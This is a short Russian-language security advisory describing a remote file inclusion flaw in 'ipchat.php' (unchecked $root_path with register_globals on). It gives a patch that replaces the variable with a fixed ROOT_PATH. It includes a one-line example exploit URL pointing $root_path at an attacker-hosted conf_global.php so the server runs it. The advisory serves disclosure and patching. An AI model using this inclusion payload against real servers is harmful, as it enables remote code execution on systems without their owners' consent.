|
|
 |
|
|
|
|
|
|
Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на уязвимом сервере. Опасно только при настроках PHP с register_globals=ON.
Сценарий 'ipchat.php' включает файл conf_global.php через переменную $root_path, но не проверяет правильность местоположения файла.
Удаленный пользователь может определить удаленное местоположение для $root_path переменной, чтобы включить удаленно расположенный файл conf_global.php, который будет выполнен на целевом сервере.
Пример/Эксплоит:
http://[target]/ipchat.php?root_path=http://[attacker]/ c файлом : http://[attacker]/conf_global.php
Исправление:
В ipchat.php найти:
require $root_path."conf_global.php";
Заменить на:
define( 'ROOT_PATH' , "./" ); require ROOT_PATH."conf_global.php";
Работает на DokuWiki |